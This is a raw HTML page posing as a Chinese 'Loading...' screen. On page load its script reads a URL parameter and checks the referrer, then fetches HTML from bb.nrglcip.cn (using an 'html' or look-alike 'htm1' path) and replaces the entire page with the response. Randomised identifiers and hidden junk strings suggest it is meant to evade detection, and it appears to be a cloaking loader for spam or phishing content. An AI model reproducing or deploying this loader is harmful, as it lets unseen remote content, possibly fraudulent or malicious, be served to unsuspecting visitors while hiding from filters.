<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .VktlLkv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .VktlLkv .E4hG3wLHh {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .VktlLkv .content {
            line-height: 50px;
            text-align: center
        }

        .VktlLkv .img {
            width: 100%
        }

        .VktlLkv .hGmcW8i {
            text-align: center
        }

        .VktlLkv .hGmcW8i span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .VktlLkv .hGmcW8i span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .VktlLkv .hGmcW8i span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .VktlLkv .hGmcW8i span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .VktlLkv .hGmcW8i span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .VktlLkv .hGmcW8i span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .VktlLkv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vi6ABnzWiYyE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QC690a = vi6ABnzWiYyE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QC690a +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QC690a +".html?a=share";
		}
		
        ZqEG7Pxy=url+"#"+new Date().getTime();
        ZqEG7Pxy && function() {
            $.get(ZqEG7Pxy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Y9M86epgl5AZUdvhK1smxXbLA4zQU8kdqd6f6GbrJu5qYalmZ38vyF6WX1kXEfEq</span>
<div style='display:none'>bsc16SaF0NIzKEbrVT1sCxsVpp4f3x</div>
<h1 style='display:none' >RMdIjRR68lsch3WDx4iv8CASuwQnXr6FOfNox7SfTwYFUvUUr</h1><div class="VktlLkv">
    <div class="E4hG3wLHh">
        <div class="hGmcW8i">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>Ig93FEHC3LxfpcyYNgi4V7IMDrbUQnXf5zVpyC4eNMi9x847glyMZXDhU4kbDUxqJCV8Rog8MhFkHKLT9U2ynlY3Pvvey</div>
<div style='display:none'>Ig93FEHC3LxfpcyYNgi4V7IMDrbUQnXf5zVpyC4eNMi9x847glyMZXDhU4kbDUxqJCV8Rog8MhFkHKLT9U2ynlY3Pvvey</div>
<b style='display:none' >G4P93vqlA2XVdGroL1gpYPD8OlAqFz9LtlJoRvTqCMA9</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>